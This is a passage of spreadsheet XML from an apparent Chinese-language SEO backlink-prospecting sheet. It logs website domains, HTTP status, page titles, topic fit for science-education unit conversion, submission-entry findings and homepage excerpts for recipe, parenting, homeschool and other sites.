        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K298" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L298" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M298" s="19" t="str">
        <x:v>https://coalitionbrewing.com/</x:v>
      </x:c>
      <x:c r="N298" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O298" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P298" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q298" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R298" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S298" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T298" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://coalitionbrewing.com</x:v>
      </x:c>
    </x:row>
    <x:row r="299">
      <x:c r="A299" s="18" t="str">
        <x:v>298</x:v>
      </x:c>
      <x:c r="B299" s="19" t="str">
        <x:v>r2sasheville.org</x:v>
      </x:c>
      <x:c r="C299" s="19" t="str">
        <x:v>https://r2sasheville.org</x:v>
      </x:c>
      <x:c r="D299" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E299" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F299" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G299" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H299" s="19" t="str">
        <x:v>https://www.r2sasheville.org/</x:v>
      </x:c>
      <x:c r="I299" s="19" t="str">
        <x:v>Read To Succeed Asheville/Buncombe - Welcome to Read to Succeed Asheville/Buncombe</x:v>
      </x:c>
      <x:c r="J299" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K299" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L299" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M299" s="19" t="str">
        <x:v>https://www.r2sasheville.org/</x:v>
      </x:c>
      <x:c r="N299" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O299" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P299" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q299" s="21" t="str">
        <x:v>We are on a mission to inspire and teach kids to read. Help us close the literacy achievement gap in Asheville City and Buncombe County Schools. Read To Succeed Asheville/Buncombe - Welcome to Read to Succeed Asheville/Buncombe Read to Succeed Asheville/Buncombe Home R2S Programs Early Childhood Support Elementary (K-5) Tutoring Community Literacy Access Literacy Training Volunteer R2S Volunteer Opportunities Reading Tutor Apply to Volunteer Background Checks Word Work Family Reading Resources Family Reading Resources Free Reading Apps for Kids R2S Family Reading Newsletters Online Reading Resources Read-Aloud Donate Contribute Page Turners Circle Additional Ways to Give to R2S Book Donations About Us Our Mission Leadership Team Organizational Documents Join the R2S Team Black Businesses R2S Loves News R2S Upcoming Events R2S Blog Co</x:v>
      </x:c>
      <x:c r="R299" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S299" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T299" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://r2sasheville.org</x:v>
      </x:c>
    </x:row>
    <x:row r="300">
      <x:c r="A300" s="18" t="str">
        <x:v>299</x:v>
      </x:c>
      <x:c r="B300" s="19" t="str">
        <x:v>nummyrecipes.com</x:v>
      </x:c>
      <x:c r="C300" s="19" t="str">
        <x:v>https://nummyrecipes.com</x:v>
      </x:c>
      <x:c r="D300" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E300" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F300" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G300" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H300" s="19" t="str">
        <x:v>https://nummyrecipes.com/</x:v>
      </x:c>
      <x:c r="I300" s="19" t="str">
        <x:v>Home - Nummy Recipes</x:v>
      </x:c>
      <x:c r="J300" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K300" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L300" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M300" s="19" t="str">
        <x:v>https://nummyrecipes.com/</x:v>
      </x:c>
      <x:c r="N300" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O300" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P300" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q300" s="21" t="str">
        <x:v>Here are the most popular recipes. Home - Nummy Recipes Skip to content Nummy Recipes Menu Dinner Recipes Desserts Snacks Drinks Appetizer About Us 15 Thai Hot Pepper Recipes from Appetizers to Mains other recipes 17 Keto Breakfast Recipes for a Healthy Morning other recipes 19 Comforting Eckrich Smoked Sausage Dishes other recipes 13 Whole Grain Bread Sandwich Recipes: Quick Lunch Wins other recipes Latest Recipes 18 Cheap Breakfast Recipes You Can Make This Week other recipes 20 Creative Vegetarian Wrap Recipes to Savor other recipes 13 Classic Malanga Coco Recipes from Latin Kitchens other recipes 16 Ninja Foodi Grill Recipes, From Tacos to Steaks other recipes Dinner cooking Here are the most popular recipes. View all rec</x:v>
      </x:c>
      <x:c r="R300" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S300" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T300" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://nummyrecipes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="301">
      <x:c r="A301" s="18" t="str">
        <x:v>300</x:v>
      </x:c>
      <x:c r="B301" s="19" t="str">
        <x:v>b-s-g.net</x:v>
      </x:c>
      <x:c r="C301" s="19" t="str">
        <x:v>https://b-s-g.net</x:v>
      </x:c>
      <x:c r="D301" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E301" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F301" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G301" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H301" s="19" t="str">
        <x:v>http://b-s-g.net/</x:v>
      </x:c>
      <x:c r="I301" s="19" t="str">
        <x:v>Battle Squadron Germany</x:v>
      </x:c>
      <x:c r="J301" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K301" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L301" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M301" s="19" t="str">
        <x:v>http://b-s-g.net/</x:v>
      </x:c>
      <x:c r="N301" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O301" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P301" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q301" s="21" t="str">
        <x:v>Battle Squadron Germany - Einziger Only Deutscher T2 Base Clan. Multigaming since 1999. Battle Squadron Germany "Yes, mighty warrior... What you hear now are the suffering, voices of all the heroes that crossed these lands before you. They ended their tragically but their thirst for victory is still alive and breathers through these ancient rocks corroded by the fury of the wind. Their pride now rides with you..."</x:v>
      </x:c>
      <x:c r="R301" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S301" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T301" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://b-s-g.net
http://b-s-g.net</x:v>
      </x:c>
    </x:row>
    <x:row r="302">
      <x:c r="A302" s="18" t="str">
        <x:v>301</x:v>
      </x:c>
      <x:c r="B302" s="19" t="str">
        <x:v>simplyfullofdelight.com</x:v>
      </x:c>
      <x:c r="C302" s="19" t="str">
        <x:v>https://simplyfullofdelight.com</x:v>
      </x:c>
      <x:c r="D302" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E302" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F302" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G302" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H302" s="19" t="str">
        <x:v>https://simplyfullofdelight.com/</x:v>
      </x:c>
      <x:c r="I302" s="19" t="str">
        <x:v>Simply Full of Delight - Practical Help For Parents</x:v>
      </x:c>
      <x:c r="J302" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K302" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L302" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M302" s="19" t="str">
        <x:v>https://simplyfullofdelight.com/</x:v>
      </x:c>
      <x:c r="N302" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O302" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P302" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q302" s="21" t="str">
        <x:v>Practical Help for Parents Simply Full of Delight - Practical Help For Parents Menu Parenting Teaching Your Child Parenting Humor Family Finances Faith &amp; Foster Care Family Fun Disney Kid Activities Sensory Play Preschool Learning Screen Free Activities Bible Lessons Favorite Books Themes Farm Back to School Spring crafts and activities Summer Activities and crafts Fall Activities for kids Winter crafts and printables Holidays Valentine’s Day St. Patrick’s Day Easter Earth Day Mother’s Day Father’s Day 4th of July Halloween Thanksgiving Christmas New Year Recipes Breakfast Appetizers Main Dishes Side Dishes Desserts Resource Library Resource Library Let’s Shop! Gift Guides Simply Full of Delight Practical Help For Par</x:v>
      </x:c>
      <x:c r="R302" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S302" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T302" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://simplyfullofdelight.com</x:v>
      </x:c>
    </x:row>
    <x:row r="303">
      <x:c r="A303" s="18" t="str">
        <x:v>302</x:v>
      </x:c>
      <x:c r="B303" s="19" t="str">
        <x:v>homemadebklyn.com</x:v>
      </x:c>
      <x:c r="C303" s="19" t="str">
        <x:v>https://homemadebklyn.com</x:v>
      </x:c>
      <x:c r="D303" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E303" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F303" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G303" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H303" s="19" t="str">
        <x:v>https://www.homemadebklyn.com/</x:v>
      </x:c>
      <x:c r="I303" s="19" t="str">
        <x:v>Home/Made</x:v>
      </x:c>
      <x:c r="J303" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K303" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L303" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M303" s="19" t="str">
        <x:v>https://www.homemadebklyn.com/</x:v>
      </x:c>
      <x:c r="N303" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O303" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P303" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q303" s="21" t="str">
        <x:v>Home/Made Skip to content Menu Cleaning Tips Vacuum Brands Vacuum Types Bedroom Diy Project entertainment Laundry Room Living Tips Write for Us Menu Cleaning Tips Vacuum Brands Vacuum Types Bedroom Diy Project entertainment Laundry Room Living Tips Write for Us Recent Posts Why Maintenance Records Matter When Selling a Home? Top Causes of Clogged Drains and How to Avoid Them The Bathroom Choice That Changes How the Whole Space Feels Dash Diet Recipes For Weight Loss 20 Best Low-Sodium Recipes 9 Easy Keto Dessert Recipes Ketogenic Diet For A Fast Weight Loss 8 Vegetarian Keto Recipes For Delicious And Meat-Free Ketogenic Diet 9 Keto Thanksgiving Recipes That Will Make Your Holiday Yummy 12 Ke</x:v>
      </x:c>
      <x:c r="R303" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S303" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T303" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://homemadebklyn.com</x:v>
      </x:c>
    </x:row>
    <x:row r="304">
      <x:c r="A304" s="18" t="str">
        <x:v>303</x:v>
      </x:c>
      <x:c r="B304" s="19" t="str">
        <x:v>togethertimefamily.com</x:v>
      </x:c>
      <x:c r="C304" s="19" t="str">
        <x:v>https://togethertimefamily.com</x:v>
      </x:c>
      <x:c r="D304" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E304" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F304" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G304" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H304" s="19" t="str">
        <x:v>https://togethertimefamily.com/</x:v>
      </x:c>
      <x:c r="I304" s="19" t="str">
        <x:v>Home - Appalachian Wood Homestead</x:v>
      </x:c>
      <x:c r="J304" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K304" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L304" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M304" s="19" t="str">
        <x:v>https://togethertimefamily.com/</x:v>
      </x:c>
      <x:c r="N304" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O304" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P304" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q304" s="21" t="str">
        <x:v>Home - Appalachian Wood Homestead Skip to content Timber Frame Classes Wood carving Gardening Herb Growing Guides Harvesting and Preserving Homestead Recipes Tools &amp; Equipment Chainsaws Garden Hoses Yardwork Tools About Appalachian Wood Homestead Appalachian Wood Homestead Latest Blog Posts Wood Carving Stencils and Favorite Carving Tools March 15, 2026 Stairs and Ladder Jig Pack – How to Use February 18, 2026 2x Dovetail Jig – How to Use February 2, 2026 Shouldered Dovetail Tenon Jig – How to Use January 30, 2026 Large Dovetail Jig – How to Use January 30, 2026 Simple Scandinavian Inspired Wood Santa Carving Tutorial November 5, 2025 Large Tapered Dovetail Router Jig Template for Timber Fra</x:v>
      </x:c>
      <x:c r="R304" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S304" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T304" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://togethertimefamily.com</x:v>
      </x:c>
    </x:row>
    <x:row r="305">
      <x:c r="A305" s="18" t="str">
        <x:v>304</x:v>
      </x:c>
      <x:c r="B305" s="19" t="str">
        <x:v>thebensonstreet.com</x:v>
      </x:c>
      <x:c r="C305" s="19" t="str">
        <x:v>https://thebensonstreet.com</x:v>
      </x:c>
      <x:c r="D305" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E305" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="F305" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G305" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H305" s="19" t="str">
        <x:v>https://thebensonstreet.com/</x:v>
      </x:c>
      <x:c r="I305" s="19" t="str">
        <x:v>Homepage - The Benson Street</x:v>
      </x:c>
      <x:c r="J305" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K305" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L305" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M305" s="19" t="str">
        <x:v>https://thebensonstreet.com/</x:v>
      </x:c>
      <x:c r="N305" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O305" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P305" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q305" s="21" t="str">
        <x:v>Homepage - The Benson Street Skip to content Home About Me About Me Buttons {Link Parties} {Contact} Privacy Policy Recipes Breakfast Lunch Dinner Dessert Sides and Veggies Holidays Valentine’s St. Patty’s Spring Easter Earth Day Cinco de Mayo Mother’s Day Father’s Day Summer Patriotic Fall Halloween Thanksgiving Winter Christmas Tutorial DIY Jewelry Kids Crafts Home Decor Free Printables Social Media Management Services Recipes Holidays Tutorials Printables Latest Posts The Nightmare Before Christmas Jack Skellington Cupcakes Recipe Free Printable Moon and Stars Pumpkin Carving Pattern Free Printable Big Hero 6 Baymax Pumpkin Carving Stencil Free Printable Cute Owl Pumpkin Carving Stencil F</x:v>
      </x:c>
      <x:c r="R305" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S305" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T305" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thebensonstreet.com</x:v>
      </x:c>
    </x:row>
    <x:row r="306">
      <x:c r="A306" s="18" t="str">
        <x:v>305</x:v>
      </x:c>
      <x:c r="B306" s="19" t="str">
        <x:v>homediy.co</x:v>
      </x:c>
      <x:c r="C306" s="19" t="str">
        <x:v>https://homediy.co</x:v>
      </x:c>
      <x:c r="D306" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E306" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="F306" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G306" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H306" s="19" t="str">
        <x:v>https://homediy.co/</x:v>
      </x:c>
      <x:c r="I306" s="19" t="str">
        <x:v>Home DIY</x:v>
      </x:c>
      <x:c r="J306" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K306" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L306" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M306" s="19" t="str">
        <x:v>https://homediy.co/</x:v>
      </x:c>
      <x:c r="N306" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O306" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P306" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q306" s="21" t="str">
        <x:v>Home DIY Skip to content Cleaning Organizing DIY Decor Wallpapers About Disclosure Policy Privacy Policy Sample Page 15 Best Sides for Lasagna: What to Serve with Lasagna Recipes Lasagna is the ultimate comfort food: hearty, cheesy, filling, and substantial enough to satisfy the whole family. But even when you have a bubbling pan of lasagna ready to serve, a few well-chosen side dishes can make the meal feel more complete. The trick is to balance the richness of the main course with something [&amp;hellip;] 15 Best Sides for Lasagna: What to Serve with Lasagna Read More » What to Serve with Fried Rice: 20 Best Recipes Well with Fried Rice Recipes Fried rice is one of those wonderfully versatile </x:v>
      </x:c>
      <x:c r="R306" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S306" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T306" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://homediy.co</x:v>
      </x:c>
    </x:row>
    <x:row r="307">
      <x:c r="A307" s="18" t="str">
        <x:v>306</x:v>
      </x:c>
      <x:c r="B307" s="19" t="str">
        <x:v>lifeandhomeschool.com</x:v>
      </x:c>
      <x:c r="C307" s="19" t="str">
        <x:v>https://lifeandhomeschool.com</x:v>
      </x:c>
      <x:c r="D307" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E307" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="F307" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G307" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H307" s="19" t="str">
        <x:v>https://lifeandhomeschool.com/</x:v>
      </x:c>
      <x:c r="I307" s="19" t="str">
        <x:v>Life + Homeschool Blog | Free educational resources and mom tips</x:v>
      </x:c>
      <x:c r="J307" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K307" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L307" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M307" s="19" t="str">
        <x:v>https://lifeandhomeschool.com/</x:v>
      </x:c>
      <x:c r="N307" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O307" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P307" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q307" s="21" t="str">
        <x:v>Life + Homeschool Blog | Free educational resources and mom tips LIFE HOMESCHOOL Life + Homeschool Blog Welcome to Life + Homeschool Thanks for checking out our blog! Here on Life + Homeschool, I like to share all things life-related and homeschool-related. If you are looking for life tips, mom help, recipes, or kid activities , check out the life page on our blog! If you’re in need of homeschool resources, lesson planning help , or curriculum reviews, head over to the homeschool page instead! Don’t forget to check out our about page and our main website for information on our family and our mission. Recent Blog Posts Mushroom Template by Mary | Kid Activities 2 adorable shroom style to choo</x:v>
      </x:c>
      <x:c r="R307" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S307" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T307" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lifeandhomeschool.com</x:v>
      </x:c>
    </x:row>
    <x:row r="308">
      <x:c r="A308" s="18" t="str">
        <x:v>307</x:v>
      </x:c>
      <x:c r="B308" s="19" t="str">
        <x:v>kingascorner.com</x:v>
      </x:c>
      <x:c r="C308" s="19" t="str">
        <x:v>https://kingascorner.com</x:v>
      </x:c>
      <x:c r="D308" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E308" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F308" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G308" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H308" s="19" t="str">
        <x:v>https://www.kingascorner.com/</x:v>
      </x:c>
      <x:c r="I308" s="19" t="str">
        <x:v>Mom Blog About Mom Tips, Kids Activities And Printables</x:v>
      </x:c>
      <x:c r="J308" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K308" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L308" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M308" s="19" t="str">
        <x:v>https://www.kingascorner.com/</x:v>
      </x:c>
      <x:c r="N308" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O308" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P308" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q308" s="21" t="str">
        <x:v>A mom blog where you'll find unique mom tips, engaging kids activities, top-rated toys, creative crafts, and printable resources on our blog. Empower your parenting journey today! Mom Blog About Mom Tips, Kids Activities And Printables Skip to content Now Trending : What is open-ended play, why it’s important for kids Kids Activities Indoor Activities Outdoor Activities Seasonal Activities Crafts Sensory Play Games by Age Free Printables Word Search Coloring Pages Mazes Scavenger Hunts Worksheets BLW Getting Started BLW Equipment BLW Foods Baby Pregnancy Postpartum Breastfeeding Newborn Care Baby Essentials Mom Life Routines Productivity Self-Care Shop Browse by interests pregnancy breastfeeding baby led weaning Kids activities printables Productivity from one mommy to another… I help moms with their journey tips for New Moms kids Craft Activities printable Kids Works</x:v>
      </x:c>
      <x:c r="R308" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S308" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T308" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kingascorner.com
http://kingascorner.com</x:v>
      </x:c>
    </x:row>
    <x:row r="309">
      <x:c r="A309" s="18" t="str">
        <x:v>308</x:v>
      </x:c>
      <x:c r="B309" s="19" t="str">
        <x:v>uk.com</x:v>
      </x:c>
      <x:c r="C309" s="19" t="str">
        <x:v>https://uk.com</x:v>
      </x:c>
      <x:c r="D309" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E309" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F309" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G309" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H309" s="19" t="str">
        <x:v>https://uk.com/</x:v>
      </x:c>
      <x:c r="I309" s="19" t="str">
        <x:v>UK.COM | A Powerful Domain for the United Kingdom</x:v>
      </x:c>
      <x:c r="J309" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K309" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L309" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M309" s="19" t="str">
        <x:v>https://uk.com/</x:v>
      </x:c>
      <x:c r="N309" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O309" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P309" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q309" s="21" t="str">
        <x:v>Strengthen your online presence in the UK with .UK.COM — an open and globally recognized domain. No registration restrictions, just premium name availability. Secure yours now! UK.COM | A Powerful Domain for the United Kingdom Menu Register Why .UK.COM? Live Sites WHOIS Contact Us Report Abuse The global domain for the United Kingdom Search Loading results... Why choose .UK.COM? UNRESTRICTED GLOBAL ACCESS .UK.COM is open to everyone, anywhere —no residency or business presence required. UK MARKET VISIBILITY WITH GLOBAL REACH With .UK.COM , businesses can establish a clear British identity while benefiting from the global recognition of .COM . This allows international companies to expand into the UK without regulatory barriers . SEO &amp; MARKET ACCESSIBILITY Our intent with .UK.COM is to be search engine-friendly by providing an unrestricted .COM variant specifically </x:v>
      </x:c>
      <x:c r="R309" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S309" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T309" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://uk.com</x:v>
      </x:c>
    </x:row>
    <x:row r="310">
      <x:c r="A310" s="18" t="str">
        <x:v>309</x:v>
      </x:c>
      <x:c r="B310" s="19" t="str">
        <x:v>judy-nolan.com</x:v>
      </x:c>
      <x:c r="C310" s="19" t="str">
        <x:v>https://judy-nolan.com</x:v>
      </x:c>
      <x:c r="D310" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E310" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F310" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G310" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H310" s="19" t="str">
        <x:v>https://judy-nolan.com/</x:v>
      </x:c>
      <x:c r="I310" s="19" t="str">
        <x:v>Judy Nolan</x:v>
      </x:c>
      <x:c r="J310" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K310" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L310" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M310" s="19" t="str">
        <x:v>https://judy-nolan.com/</x:v>
      </x:c>
      <x:c r="N310" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O310" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P310" s="21" t="str">
